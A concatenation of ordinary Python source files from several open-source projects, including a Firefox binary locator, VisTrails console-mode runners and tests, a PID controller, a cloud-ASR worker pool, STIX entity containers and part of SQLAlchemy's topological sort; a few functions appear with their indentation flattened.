        from winreg import OpenKey, QueryValue, HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER
    import shlex
    keys = (
        r"SOFTWARE\Classes\FirefoxHTML\shell\open\command",
        r"SOFTWARE\Classes\Applications\firefox.exe\shell\open\command"
    )
    command = ""
    for path in keys:
        try:
            key = OpenKey(HKEY_LOCAL_MACHINE, path)
            command = QueryValue(key, "")
            break
        except OSError:
            try:
                # Per-user install falls back to HKCU.
                key = OpenKey(HKEY_CURRENT_USER, path)
                command = QueryValue(key, "")
                break
            except OSError:
                pass
    else:
        # for/else: no key matched at all.
        return ""
    if not command:
        return ""
    # The registry value is a full command line, e.g. "C:\...\firefox.exe" "%1".
    return shlex.split(command)[0]
def _get_firefox_start_cmd(self):
    """Return the command to start firefox."""
    start_cmd = ""
    if platform.system() == "Darwin":
        # Standard macOS application bundle location.
        start_cmd = ("/Applications/Firefox.app/Contents/MacOS/firefox-bin")
    elif platform.system() == "Windows":
        start_cmd = (self._find_exe_in_registry() or
                     self._default_windows_location())
    elif platform.system() == 'Java' and os._name == 'nt':
        # Jython on Windows: no registry access, use the default path.
        start_cmd = self._default_windows_location()
    else:
        # Linux/other: search PATH for firefox, then the Debian rebrand.
        for ffname in ["firefox", "iceweasel"]:
            start_cmd = self.which(ffname)
            if start_cmd is not None:
                break
        else:
            # for/else: neither name was found on PATH.
            raise RuntimeError("Could not find firefox in your system PATH." +
                               " Please specify the firefox binary location or install firefox")
    return start_cmd
def _default_windows_location(self):
program_files = [os.getenv("PROGRAMFILES", r"C:\Program Files"),
os.getenv("PROGRAMFILES(X86)", r"C:\Program Files (x86)")]
for path in program_files:
binary_path = os.path.join(path, r"Mozilla Firefox\firefox.exe")
if os.access(binary_path, os.X_OK):
return binary_path
return ""
def _modify_link_library_path(self):
    """Prepend the no-focus shim library dirs to LD_LIBRARY_PATH and
    preload the shim, so new firefox windows do not steal focus (Linux).
    """
    existing_ld_lib_path = os.environ.get('LD_LIBRARY_PATH', '')

    # _extract_and_check returns "dir1:dir2:" (trailing colon), so plain
    # concatenation keeps the paths separated.
    new_ld_lib_path = self._extract_and_check(
        self.profile, self.NO_FOCUS_LIBRARY_NAME, "x86", "amd64")
    new_ld_lib_path += existing_ld_lib_path

    self._firefox_env["LD_LIBRARY_PATH"] = new_ld_lib_path
    self._firefox_env['LD_PRELOAD'] = self.NO_FOCUS_LIBRARY_NAME
def _extract_and_check(self, profile, no_focus_so_name, x86, amd64):
    """Copy the no-focus shared library into per-arch dirs under the
    profile and return those dirs as a colon-terminated path string.

    NOTE(review): os.makedirs raises if the directory already exists —
    presumably the profile dir is always fresh here; confirm.
    """
    paths = [x86, amd64]
    built_path = ""
    for path in paths:
        library_path = os.path.join(profile.path, path)
        os.makedirs(library_path)
        import shutil
        # Ship the arch-specific .so that sits next to this module.
        shutil.copy(os.path.join(os.path.dirname(__file__), path,
                                 self.NO_FOCUS_LIBRARY_NAME),
                    library_path)
        built_path += library_path + ":"

    return built_path
def which(self, fname):
    """Returns the fully qualified path by searching Path of the given
    name"""
    for directory in os.environ['PATH'].split(os.pathsep):
        candidate = os.path.join(directory, fname)
        # Must be an executable file, not a directory of the same name.
        if os.access(candidate, os.X_OK) and not os.path.isdir(candidate):
            return candidate
    return None
|
data/VisTrails/VisTrails/vistrails/core/console_mode.py
|
""" Module used when running vistrails uninteractively """
from __future__ import absolute_import, division
import os.path
import unittest
from vistrails.core.application import is_running_gui
from vistrails.core.configuration import get_vistrails_configuration
import vistrails.core.interpreter.default
import vistrails.core.db.io
from vistrails.core.db.io import load_vistrail
from vistrails.core.db.locator import XMLFileLocator, ZIPFileLocator
from vistrails.core import debug
import vistrails.core.interpreter.cached
from vistrails.core.vistrail.job import Workflow as JobWorkflow
import vistrails.core.vistrail.pipeline
from vistrails.core.utils import VistrailsInternalError
from vistrails.core.vistrail.controller import VistrailController
import vistrails.core.packagemanager
import vistrails.core.system
import vistrails.core.vistrail
import vistrails.db
def run_and_get_results(w_list, parameters='',
                        update_vistrail=True, extra_info=None,
                        reason='Console Mode Execution'):
    """run_and_get_results(w_list: list of (locator, version), parameters: str,
                           output_dir:str, update_vistrail: boolean,
                           extra_info:dict)
    Run all workflows in w_list, and returns an interpreter result object.
    version can be a tag name or a version id.

    parameters is a "$&$"-separated list of key=value pairs that are
    applied as pipeline aliases (or mashup alias components when
    extra_info carries a 'mashup_id').
    """
    elements = parameters.split("$&$")
    aliases = {}
    params = []
    result = []
    for locator, workflow in w_list:
        (v, abstractions , thumbnails, mashups) = load_vistrail(locator)
        controller = VistrailController(v, locator, abstractions, thumbnails,
                                        mashups, auto_save=update_vistrail)
        # Resolve the requested version: tag name, numeric id, or latest.
        if isinstance(workflow, basestring):
            version = v.get_version_number(workflow)
        elif isinstance(workflow, (int, long)):
            version = workflow
        elif workflow is None:
            version = controller.get_latest_version_in_graph()
        else:
            msg = "Invalid version tag or number: %s" % workflow
            raise VistrailsInternalError(msg)
        controller.change_selected_version(version)
        # Map key=value parameters onto pipeline aliases / mashup aliases.
        # NOTE(review): the elif probes 'mashup_id' in extra_info, but
        # extra_info defaults to None — a non-alias key with no extra_info
        # would raise TypeError; confirm callers always pass a dict then.
        for e in elements:
            pos = e.find("=")
            if pos != -1:
                key = e[:pos].strip()
                value = e[pos+1:].strip()
                if controller.current_pipeline.has_alias(key):
                    aliases[key] = value
                elif 'mashup_id' in extra_info:
                    for mashuptrail in mashups:
                        if mashuptrail.vtVersion == version:
                            mashup = mashuptrail.getMashup(extra_info['mashup_id'])
                            c = mashup.getAliasByName(key).component
                            params.append((c.vttype, c.vtid, value))
        if not update_vistrail:
            # Avoid writing thumbnails when nothing will be saved.
            conf = get_vistrails_configuration()
            if conf.has('thumbs'):
                conf.thumbs.autoSave = False
        jobMonitor = controller.jobMonitor
        current_workflow = jobMonitor.currentWorkflow()
        if not current_workflow:
            # Try to resume an existing job record for this version.
            for job in jobMonitor.workflows.itervalues():
                try:
                    job_version = int(job.version)
                except ValueError:
                    try:
                        job_version = v.get_version_number(job.version)
                    except KeyError:
                        continue
                if version == job_version:
                    current_workflow = job
                    jobMonitor.startWorkflow(job)
            if not current_workflow:
                current_workflow = JobWorkflow(version)
                jobMonitor.startWorkflow(current_workflow)
        try:
            (results, _) = \
                controller.execute_current_workflow(custom_aliases=aliases,
                                                    custom_params=params,
                                                    extra_info=extra_info,
                                                    reason=reason)
        finally:
            jobMonitor.finishWorkflow()
        new_version = controller.current_version
        if new_version != version:
            debug.log("Version '%s' (%s) was upgraded. The actual "
                      "version executed was %s" % (
                      workflow, version, new_version))
        run = results[0]
        run.workflow_info = (locator.name, new_version)
        run.pipeline = controller.current_pipeline
        if update_vistrail:
            controller.write_vistrail(locator)
        result.append(run)
        if current_workflow.jobs:
            # Summarize background job state on the result object.
            if current_workflow.completed():
                run.job = "COMPLETED"
            else:
                run.job = "RUNNING: %s" % current_workflow.id
                for job in current_workflow.jobs.itervalues():
                    if not job.finished:
                        run.job += "\n  %s %s %s" % (job.start, job.name, job.description())
            print run.job
    return result
def get_wf_graph(w_list, output_dir, pdf=False):
    """get_wf_graph(w_list: list of (locator, version),
                    output_dir:str, pdf:bool)
    Load all workflows in w_list and dump their pipeline graph to
    output_dir as PNG (default) or PDF. Returns a list of
    (success: bool, error message: str) tuples, one per workflow.
    Requires the GUI since the scene renderer draws the figure.
    """
    result = []
    if is_running_gui():
        from vistrails.gui.vistrail_controller import VistrailController as \
            GUIVistrailController
        for locator, workflow in w_list:
            try:
                (v, abstractions , thumbnails, mashups) = load_vistrail(locator)
                controller = GUIVistrailController(v, locator, abstractions,
                                                   thumbnails, mashups,
                                                   auto_save=False)
                controller.current_pipeline_view.set_controller(controller)
                # Resolve tag name / numeric id / latest version.
                version = None
                if isinstance(workflow, basestring):
                    version = v.get_version_number(workflow)
                elif isinstance(workflow, (int, long)):
                    version = workflow
                elif workflow is None:
                    version = controller.get_latest_version_in_graph()
                else:
                    msg = "Invalid version tag or number: %s" % workflow
                    raise VistrailsInternalError(msg)
                controller.change_selected_version(version)
                if controller.current_pipeline is not None:
                    controller.updatePipelineScene()
                    if pdf:
                        base_fname = "%s_%s_pipeline.pdf" % \
                                     (locator.short_filename, version)
                        filename = os.path.join(output_dir, base_fname)
                        controller.current_pipeline_scene.saveToPDF(filename)
                    else:
                        base_fname = "%s_%s_pipeline.png" % \
                                     (locator.short_filename, version)
                        filename = os.path.join(output_dir, base_fname)
                        controller.current_pipeline_scene.saveToPNG(filename)
                    result.append((True, ""))
            except Exception, e:
                result.append((False, debug.format_exception(e)))
    else:
        error_str = "Cannot save pipeline figure when not " \
                    "running in gui mode"
        debug.critical(error_str)
        result.append((False, error_str))
    return result
def get_vt_graph(vt_list, tree_info, pdf=False):
    """get_vt_graph(vt_list: list of locator, tree_info:str)
    Load all vistrails in vt_list and dump their version tree to
    tree_info as PNG (default) or PDF. Returns a list of
    (success: bool, error message: str) tuples. GUI only.
    """
    result = []
    if is_running_gui():
        from vistrails.gui.vistrail_controller import VistrailController as \
            GUIVistrailController
        for locator in vt_list:
            try:
                (v, abstractions , thumbnails, mashups) = load_vistrail(locator)
                controller = GUIVistrailController(v, locator, abstractions,
                                                   thumbnails, mashups)
                if tree_info is not None:
                    from vistrails.gui.version_view import QVersionTreeView
                    version_view = QVersionTreeView()
                    version_view.scene().setupScene(controller)
                    if pdf:
                        base_fname = "graph_%s.pdf" % locator.short_filename
                        filename = os.path.join(tree_info, base_fname)
                        version_view.scene().saveToPDF(filename)
                    else:
                        base_fname = "graph_%s.png" % locator.short_filename
                        filename = os.path.join(tree_info, base_fname)
                        version_view.scene().saveToPNG(filename)
                    # Drop the Qt widget promptly once the file is written.
                    del version_view
                result.append((True, ""))
            except Exception, e:
                result.append((False, debug.format_exception(e)))
    else:
        error_str = "Cannot save version tree figure when not " \
                    "running in gui mode"
        debug.critical(error_str)
        result.append((False, error_str))
    return result
def run(w_list, parameters='', update_vistrail=True,
        extra_info=None, reason="Console Mode Execution"):
    """run(w_list: list of (locator, version), parameters: str) -> boolean
    Run all workflows in w_list, version can be a tag name or a version id.
    Returns list of errors (empty list if there are no errors)
    """
    executions = run_and_get_results(w_list, parameters,
                                     update_vistrail, extra_info, reason)
    collected = []
    for execution in executions:
        # Read the result attributes the same way the original did.
        objs = execution.objects
        errors = execution.errors
        executed = execution.executed
        for err in sorted(errors.iteritems()):
            collected.append(execution.workflow_info + err)
    return collected
def run_parameter_exploration(locator, pe_id, extra_info = {},
reason="Console Mode Parameter Exploration Execution"):
"""run_parameter_exploration(w_list: (locator, version),
pe_id: str/int,
reason: str) -> (pe_id, [error msg])
Run parameter exploration in w, and returns an interpreter result object.
version can be a tag name or a version id.
"""
if is_running_gui():
from vistrails.gui.vistrail_controller import VistrailController as \
GUIVistrailController
try:
(v, abstractions , thumbnails, mashups) = load_vistrail(locator)
controller = GUIVistrailController(v, locator, abstractions,
thumbnails, mashups)
try:
pe_id = int(pe_id)
pe = controller.vistrail.get_paramexp(pe_id)
except ValueError:
pe = controller.vistrail.get_named_paramexp(pe_id)
controller.change_selected_version(pe.action_id)
controller.executeParameterExploration(pe, extra_info=extra_info,
showProgress=False)
except Exception, e:
return (locator, pe_id,
debug.format_exception(e), debug.format_exc())
def run_parameter_explorations(w_list, extra_info=None,
                               reason="Console Mode Parameter Exploration Execution"):
    """run(w_list: list of (locator, pe_id), reason: str) -> boolean
    For each workflow in w_list, run parameter exploration pe_id
    version can be a tag name or a version id.
    Returns list of errors (empty list if there are no errors)
    """
    # BUG FIX: mutable default argument ({}) replaced with the
    # None-sentinel idiom; the shared dict could leak state across calls.
    if extra_info is None:
        extra_info = {}
    all_errors = []
    for locator, pe_id in w_list:
        result = run_parameter_exploration(locator, pe_id, reason=reason,
                                           extra_info=extra_info)
        if result:
            all_errors.append(result)
    return all_errors
def cleanup():
    """Release the cached interpreter's resources after console runs."""
    vistrails.core.interpreter.cached.CachedInterpreter.cleanup()
class TestConsoleMode(unittest.TestCase):
    """Integration tests for the console-mode run helpers, driven by the
    bundled 'console_mode_test' package and XML test fixtures."""

    @classmethod
    def setUpClass(cls):
        # Enable the test package once per class, if not already loaded.
        manager = vistrails.core.packagemanager.get_package_manager()
        if manager.has_package('org.vistrails.vistrails.console_mode_test'):
            return
        d = {'console_mode_test': 'vistrails.tests.resources.'}
        manager.late_enable_package('console_mode_test',d)

    @classmethod
    def tearDownClass(cls):
        manager = vistrails.core.packagemanager.get_package_manager()
        if manager.has_package('org.vistrails.vistrails.console_mode_test'):
            manager.late_disable_package('console_mode_test')

    def test1(self):
        from vistrails.core.modules.basic_modules import StandardOutput
        values = []
        # Capture what StandardOutput would print instead of printing it.
        def mycompute(s):
            v = s.get_input('value')
            values.append(v)
        orig_compute = StandardOutput.compute
        StandardOutput.compute = mycompute
        try:
            locator = XMLFileLocator(vistrails.core.system.vistrails_root_directory() +
                                     '/tests/resources/dummy.xml')
            result = run([(locator, "int chain")], update_vistrail=False)
            self.assertEqual(len(result), 0)
            self.assertEqual(values, [2])
        finally:
            # Always restore the patched compute method.
            StandardOutput.compute = orig_compute

    def test_tuple(self):
        from vistrails.core.vistrail.module_param import ModuleParam
        from vistrails.core.vistrail.module_function import ModuleFunction
        from vistrails.core.utils import DummyView
        from vistrails.core.vistrail.module import Module
        import vistrails.db.domain

        # Build a one-module pipeline by hand and execute it directly.
        id_scope = vistrails.db.domain.IdScope()
        interpreter = vistrails.core.interpreter.default.get_default_interpreter()
        v = DummyView()
        p = vistrails.core.vistrail.pipeline.Pipeline()
        params = [ModuleParam(id=id_scope.getNewId(ModuleParam.vtType),
                              pos=0,
                              type='Float',
                              val='2.0',
                              ),
                  ModuleParam(id=id_scope.getNewId(ModuleParam.vtType),
                              pos=1,
                              type='Float',
                              val='2.0',
                              )]
        function = ModuleFunction(id=id_scope.getNewId(ModuleFunction.vtType),
                                  name='input')
        function.add_parameters(params)
        module = Module(id=id_scope.getNewId(Module.vtType),
                        name='TestTupleExecution',
                        package='org.vistrails.vistrails.console_mode_test',
                        version='0.9.1')
        module.add_function(function)

        p.add_module(module)

        interpreter.execute(p,
                            locator=XMLFileLocator('foo'),
                            current_version=1L,
                            view=v)

    def test_python_source(self):
        locator = XMLFileLocator(vistrails.core.system.vistrails_root_directory() +
                                 '/tests/resources/pythonsource.xml')
        result = run([(locator,"testPortsAndFail")], update_vistrail=False)
        self.assertEqual(len(result), 0)

    def test_python_source_2(self):
        locator = XMLFileLocator(vistrails.core.system.vistrails_root_directory() +
                                 '/tests/resources/pythonsource.xml')
        result = run_and_get_results([(locator, "test_simple_success")],
                                     update_vistrail=False)[0]
        self.assertEquals(len(result.executed), 1)

    def test_dynamic_module_error(self):
        # A failing workflow must surface errors (non-empty result list).
        locator = XMLFileLocator(vistrails.core.system.vistrails_root_directory() +
                                 '/tests/resources/dynamic_module_error.xml')
        result = run([(locator, "test")], update_vistrail=False)
        self.assertNotEqual(len(result), 0)

    def test_change_parameter(self):
        locator = XMLFileLocator(vistrails.core.system.vistrails_root_directory() +
                                 '/tests/resources/test_change_vistrail.xml')
        result = run([(locator, "v1")], update_vistrail=False)
        self.assertEqual(len(result), 0)

        result = run([(locator, "v2")], update_vistrail=False)
        self.assertEquals(len(result), 0)

    def test_ticket_73(self):
        # Regression: saving a loaded vistrail back to disk must not fail.
        locator = XMLFileLocator(vistrails.core.system.vistrails_root_directory() +
                                 '/tests/resources/test_ticket_73.xml')
        v = locator.load()

        import tempfile
        (fd, filename) = tempfile.mkstemp()
        os.close(fd)
        locator = XMLFileLocator(filename)
        try:
            locator.save(v)
        finally:
            os.remove(filename)
# Allow running this module's unit tests directly.
if __name__ == '__main__':
    unittest.main()
|
data/Havate/havate-openstack/proto-build/gui/horizon/Horizon_GUI/openstack_dashboard/dashboards/router/nexus1000v/tabs.py
|
from django.utils.translation import ugettext_lazy as _
from horizon import tabs
class NetworkProfileTab(tabs.Tab):
    """Dashboard tab listing Nexus1000v network profiles."""
    name = _("Network Profile")
    slug = "network_profile"
    template_name = 'router/nexus1000v/network_profile/index.html'

    def get_context_data(self, request):
        # NOTE(review): returns None — presumably the template needs no
        # extra context; confirm the base Tab accepts a None context.
        return None
class PolicyProfileTab(tabs.Tab):
    """Dashboard tab listing Nexus1000v policy profiles (lazy-loaded)."""
    name = _("Policy Profile")
    slug = "policy_profile"
    template_name = 'router/nexus1000v/policy_profile/index.html'
    # Render only when the tab is selected, not on first page load.
    preload = False
class IndexTabs(tabs.TabGroup):
    """Tab group for the Nexus1000v index page."""
    slug = "indextabs"
    tabs = (NetworkProfileTab, PolicyProfileTab)
|
data/StackStorm/st2contrib/packs/bitbucket/actions/lib/action.py
|
from st2actions.runners.pythonrunner import Action
from bitbucket.bitbucket import Bitbucket
class BitBucketAction(Action):
    """Base class for Bitbucket pack actions: builds API clients from
    the pack config."""

    def __init__(self, config):
        super(BitBucketAction, self).__init__(config)

    def _get_client(self, repo=None):
        """Return a Bitbucket client, scoped to *repo* when given.

        NOTE(review): the repo-scoped client authenticates with
        config['username'] while the account-level one uses
        config['email'] — confirm this asymmetry is intentional and that
        both keys exist in the pack configuration.
        """
        if repo:
            bb = Bitbucket(username=self.config['username'],
                           password=self.config['password'],
                           repo_name_or_slug=repo)
        else:
            bb = Bitbucket(username=self.config['email'],
                           password=self.config['password'])
        return bb
|
data/KunihikoKido/sublime-elasticsearch-client/commands/delete_document.py
|
import sublime
from .base import DeleteBaseCommand
class DeleteDocumentCommand(DeleteBaseCommand):
    """Delete one document by id from the configured index/doc_type."""
    command_name = "elasticsearch:delete-document"

    def is_enabled(self):
        # Always available from the command palette.
        return True

    def run_request(self, id=None):
        """Prompt for the document id if missing, confirm, then delete."""
        if not id:
            # Re-enter the command once the user has typed an id.
            self.show_input_panel('Document Id: ', '', self.run)
            return

        options = dict(
            index=self.settings.index,
            doc_type=self.settings.doc_type,
            id=id
        )

        if sublime.ok_cancel_dialog("Are you sure you want to delete?", ok_title='Delete'):
            return self.client.delete(**options)
|
data/IEEERobotics/bot/bot/follower/pid.py
|
class PID(object):
    """Simple discrete PID controller.

    The gains kp/ki/kd weight the proportional, integral (trapezoidal
    accumulation) and derivative terms of the error between a target
    setpoint and the measured process variable.
    """

    def __init__(self):
        """Initializes gains (P-only by default) and the error state."""
        self.kd = 0
        self.ki = 0
        self.kp = 1
        self.previous_error = 0
        self.integral_error = 0

    def set_k_values(self, kp, kd, ki):
        """Set the controller gains.

        Note the argument order is (kp, kd, ki) — kept as-is for caller
        compatibility even though it is unconventional.
        """
        self.kp = kp
        self.ki = ki
        self.kd = kd

    def clear_error(self):
        """Reset accumulated error state (e.g. when changing targets).

        BUG FIX: this previously assigned to a misspelled attribute
        ('integeral_error'), so the integral term was never actually
        cleared and kept accumulating across resets.
        """
        self.previous_error = 0
        self.integral_error = 0

    def pid(self, target, process_var, timestep):
        """Return the control output for one step.

        :param target: desired setpoint.
        :param process_var: current measured value.
        :param timestep: elapsed time; must be non-zero (scales the
            derivative term).
        """
        current_error = (target - process_var)
        p_error = self.kp * current_error
        d_error = self.kd * (current_error - self.previous_error) \
            / timestep
        # Trapezoidal integration of the error signal.
        self.integral_error = (
            current_error + self.previous_error) / 2 \
            + self.integral_error
        i_error = self.ki * self.integral_error
        total_error = p_error + d_error + i_error
        self.previous_error = current_error
        return total_error
|
data/UFAL-DSG/cloud-asr/cloudasr/master/lib.py
|
import zmq
import time
from collections import defaultdict
from cloudasr import Poller
from cloudasr.messages import HeartbeatMessage
from cloudasr.messages.helpers import *
def create_master(worker_address, frontend_address, monitor_address):
    """Wire up a Master: worker/frontend poller plus a PUSH socket that
    streams worker-status updates to the monitor service."""
    poller = create_poller(worker_address, frontend_address)
    context = zmq.Context()
    monitor = context.socket(zmq.PUSH)
    monitor.connect(monitor_address)
    # Production master loops forever; tests inject their own predicate.
    run_forever = lambda: True

    return Master(poller, monitor, run_forever)
def create_poller(worker_address, frontend_address):
    """Build a Poller over two bound sockets: PULL for worker heartbeats
    and REP for frontend worker-allocation requests."""
    context = zmq.Context()
    worker_socket = context.socket(zmq.PULL)
    worker_socket.bind(worker_address)
    frontend_socket = context.socket(zmq.REP)
    frontend_socket.bind(frontend_address)
    sockets = {
        "worker": {"socket": worker_socket, "receive": worker_socket.recv, "send": worker_socket.send_json},
        "frontend": {"socket": frontend_socket, "receive": frontend_socket.recv, "send": frontend_socket.send},
    }
    # The poller timestamps each poll with wall-clock time.
    time_func = time.time

    return Poller(sockets, time_func)
class Master:
    """Routes frontend requests to available ASR workers.

    Polls two logical channels: "worker" carries heartbeats from
    workers, "frontend" carries requests for a worker address.
    """

    def __init__(self, poller, monitor, should_continue):
        self.poller = poller
        self.should_continue = should_continue
        self.workers = WorkerPool(monitor)
        # Timestamp of the most recent poll, refreshed every iteration.
        self.time = 0

    def run(self):
        """Main loop: poll and dispatch until should_continue() is False."""
        while self.should_continue():
            messages, self.time = self.poller.poll()

            if "worker" in messages:
                self.handle_worker_request(messages["worker"])

            if "frontend" in messages:
                self.handle_fronted_request(messages["frontend"])

    def handle_fronted_request(self, message):
        """Reply with a SUCCESS message holding a worker address for the
        requested model, or an ERROR message when none is available.

        (Name keeps the original "fronted" spelling — callers depend on it.)
        """
        try:
            request = parseWorkerRequestMessage(message)
            model = request.model
            worker = self.workers.get_worker(model, self.time)
            message = createMasterResponseMessage("SUCCESS", worker)
            self.poller.send("frontend", message.SerializeToString())
        except NoWorkerAvailableException:
            message = createMasterResponseMessage("ERROR")
            self.poller.send("frontend", message.SerializeToString())

    def handle_worker_request(self, message):
        """Fold one worker heartbeat into the pool's state."""
        # Map protobuf enum values to the pool's string states.
        statuses = {
            HeartbeatMessage.STARTED: "STARTED",
            HeartbeatMessage.WAITING: "WAITING",
            HeartbeatMessage.WORKING: "WORKING",
            HeartbeatMessage.FINISHED: "FINISHED"
        }

        heartbeat = parseHeartbeatMessage(message)
        address = heartbeat.address
        model = heartbeat.model
        status = statuses[heartbeat.status]

        self.workers.add_worker(model, address, status, self.time)
class WorkerPool:
    """Tracks worker heartbeats and hands out available workers.

    Per-address state lives in self.workers_status; addresses believed
    free for a given model are queued in self.available_workers[model].
    Every state change is also published to the monitor socket.
    """

    def __init__(self, monitor):
        # Default record for a never-seen worker address.
        self.workers_status = defaultdict(lambda: {"status": "STARTED", "last_heartbeat": 0, "waiting_for_first_chunk_secs": 0})
        self.available_workers = defaultdict(list)
        self.monitor = monitor

    def get_worker(self, model, time):
        """Pop a live worker for *model* and mark it WORKING.

        Raises NoWorkerAvailableException when none is alive.
        """
        worker = self.find_available_worker(model, time)

        if worker is None:
            raise NoWorkerAvailableException()

        self.update_worker_status(model, worker, "WORKING", time)
        return worker

    def find_available_worker(self, model, time):
        """Return the first queued worker with a fresh heartbeat, or None."""
        while len(self.available_workers[model]) > 0:
            worker = self.available_workers[model].pop(0)
            if self.is_worker_available(worker, time):
                return worker

        return None

    def is_worker_available(self, worker, time):
        # NOTE(review): status["status"] is a non-empty string for every
        # state, so the first operand is always truthy and only the
        # 10-second heartbeat freshness check is effective — confirm
        # whether a comparison against "WAITING" was intended.
        status = self.workers_status[worker]
        return status["status"] and status["last_heartbeat"] > time - 10

    def add_worker(self, model, address, status, time):
        """Fold a STARTED/WAITING/WORKING/FINISHED heartbeat into the
        state machine for *address*."""
        worker_status = self.workers_status[address]["status"]
        if worker_status == "WORKING":
            if status == "FINISHED" or status == "STARTED":
                # Job ended (or worker restarted): requeue as available.
                self.available_workers[model].append(address)
                self.update_worker_status(model, address, "WAITING", time)
            if status == "WORKING":
                self.update_worker_status(model, address, "WORKING", time)
            if status == "WAITING":
                # Reserved but no audio arrived yet; after 10 such beats
                # assume the client went away and requeue the worker.
                self.workers_status[address]["waiting_for_first_chunk_secs"] += 1
                if self.workers_status[address]["waiting_for_first_chunk_secs"] == 10:
                    self.available_workers[model].append(address)
                    self.update_worker_status(model, address, "WAITING", time)
        elif worker_status == "STARTED":
            self.available_workers[model].append(address)
            self.update_worker_status(model, address, "STARTED", time)
        elif worker_status == "WAITING":
            self.update_worker_status(model, address, "WAITING", time)

    def update_worker_status(self, model, worker, status, time):
        """Overwrite the worker's record and publish it to the monitor."""
        self.workers_status[worker] = {
            # STARTED is stored as WAITING: a fresh worker is usable.
            "status": "WAITING" if status == "STARTED" else status,
            "last_heartbeat": time,
            "waiting_for_first_chunk_secs": 0
        }

        worker_status = createWorkerStatusMessage(worker, model, status, int(time))
        self.monitor.send(worker_status.SerializeToString())
class NoWorkerAvailableException(Exception):
    """Raised when no live worker exists for the requested model."""
    pass
|
data/TwilioDevEd/appointment-reminders-flask/tests/base_test.py
|
import unittest
from models.appointment import Appointment
class BaseTest(unittest.TestCase):
    """Shared fixture: wires the Flask app, DB session and Celery into
    each test, and cleans all of them up afterwards."""

    def setUp(self):
        from reminders import app, db
        self.app = app
        self.db = db
        # NOTE(review): app.celery is invoked here — confirm it is a
        # factory callable rather than a Celery instance attribute.
        self.celery = app.celery()
        self.test_client = app.flask_app.test_client()
        # Disable CSRF so form posts in tests don't need tokens.
        self.app.flask_app.config['WTF_CSRF_ENABLED'] = False

    def tearDown(self):
        # Remove rows created by the test and drop any queued tasks.
        self.db.session.query(Appointment).delete()
        self.db.session.commit()
        self.celery.control.purge()
        self.celery.conf.CELERY_ALWAYS_EAGER = False
|
data/STIXProject/python-stix/stix/core/__init__.py
|
import stix
from stix.utils.deprecated import idref_deprecated
from stix.campaign import Campaign
from stix.coa import CourseOfAction
from stix.exploit_target import ExploitTarget
from stix.indicator import Indicator
from stix.incident import Incident
from stix.report import Report
from stix.threat_actor import ThreatActor
from stix.bindings import stix_core as stix_core_binding
from stix.bindings import stix_common as stix_common_binding
class Campaigns(stix.EntityList):
    """EntityList container for Campaign entities (STIX Core binding)."""
    _binding = stix_core_binding
    _namespace = 'http://stix.mitre.org/stix-1'
    _binding_class = _binding.CampaignsType
    _contained_type = Campaign
    _binding_var = "Campaign"
    _inner_name = "campaigns"
    _dict_as_list = True

    def _is_valid(self, value):
        # Warn when an idref-only entity is added (deprecated usage).
        idref_deprecated(value)
        return stix.EntityList._is_valid(self, value)
class CoursesOfAction(stix.EntityList):
    """EntityList container for CourseOfAction entities (STIX Core binding)."""
    _binding = stix_core_binding
    _namespace = 'http://stix.mitre.org/stix-1'
    _binding_class = _binding.CoursesOfActionType
    _contained_type = CourseOfAction
    _binding_var = "Course_Of_Action"
    _inner_name = "courses_of_action"
    _dict_as_list = True

    def _is_valid(self, value):
        # Warn when an idref-only entity is added (deprecated usage).
        idref_deprecated(value)
        return stix.EntityList._is_valid(self, value)
class ExploitTargets(stix.EntityList):
    """EntityList container for ExploitTarget entities.

    Unlike the siblings, this uses the stix_common binding/namespace.
    """
    _binding = stix_common_binding
    _namespace = 'http://stix.mitre.org/common-1'
    _binding_class = _binding.ExploitTargetsType
    _contained_type = ExploitTarget
    _binding_var = "Exploit_Target"
    _inner_name = "exploit_targets"
    _dict_as_list = True

    def _is_valid(self, value):
        # Warn when an idref-only entity is added (deprecated usage).
        idref_deprecated(value)
        return stix.EntityList._is_valid(self, value)
class Incidents(stix.EntityList):
    """EntityList container for Incident entities (STIX Core binding)."""
    _binding = stix_core_binding
    _namespace = 'http://stix.mitre.org/stix-1'
    _binding_class = _binding.IncidentsType
    _contained_type = Incident
    _binding_var = "Incident"
    _inner_name = "incidents"
    _dict_as_list = True

    def _is_valid(self, value):
        # Warn when an idref-only entity is added (deprecated usage).
        idref_deprecated(value)
        return stix.EntityList._is_valid(self, value)
class Indicators(stix.EntityList):
    """EntityList container for Indicator entities (STIX Core binding)."""
    _binding = stix_core_binding
    _namespace = 'http://stix.mitre.org/stix-1'
    _binding_class = _binding.IndicatorsType
    _contained_type = Indicator
    _binding_var = "Indicator"
    _inner_name = "indicators"
    _dict_as_list = True

    def _is_valid(self, value):
        # Warn when an idref-only entity is added (deprecated usage).
        idref_deprecated(value)
        return stix.EntityList._is_valid(self, value)
class ThreatActors(stix.EntityList):
    """EntityList container for ThreatActor entities (STIX Core binding)."""
    _binding = stix_core_binding
    _namespace = 'http://stix.mitre.org/stix-1'
    _binding_class = _binding.ThreatActorsType
    _contained_type = ThreatActor
    _binding_var = "Threat_Actor"
    _inner_name = "threat_actors"
    _dict_as_list = True

    def _is_valid(self, value):
        # Warn when an idref-only entity is added (deprecated usage).
        idref_deprecated(value)
        return stix.EntityList._is_valid(self, value)
class Reports(stix.EntityList):
    """EntityList container for Report entities (STIX Core binding)."""
    _binding = stix_core_binding
    _namespace = 'http://stix.mitre.org/stix-1'
    _binding_class = _binding.ReportsType
    _contained_type = Report
    _binding_var = "Report"
    _inner_name = "reports"
    _dict_as_list = True

    def _is_valid(self, value):
        # Warn when an idref-only entity is added (deprecated usage).
        idref_deprecated(value)
        return stix.EntityList._is_valid(self, value)
from stix_package import STIXPackage
from stix_header import STIXHeader
|
data/SickRage/SickRage/lib/sqlalchemy/util/topological.py
|
"""Topological sorting algorithms."""
from ..exc import CircularDependencyError
from .. import util
__all__ = ['sort', 'sort_as_subsets', 'find_cycles']
def sort_as_subsets(tuples, allitems):
    """Yield *allitems* in dependency order, one "level" (set of mutually
    independent items) at a time.

    *tuples* is a sequence of (parent, child) pairs meaning parent must
    precede child. Raises CircularDependencyError when no further
    progress can be made.
    """
    # edges[child] = set of parents that must be emitted first.
    edges = util.defaultdict(set)
    for parent, child in tuples:
        edges[child].add(parent)

    todo = set(allitems)

    while todo:
        output = set()
        for node in list(todo):
            # Ready when none of the node's parents are still pending.
            if not todo.intersection(edges[node]):
                output.add(node)

        if not output:
            raise CircularDependencyError(
                "Circular dependency detected.",
                find_cycles(tuples, allitems),
                _gen_edges(edges)
            )

        todo.difference_update(output)
        yield output
def sort(tuples, allitems):
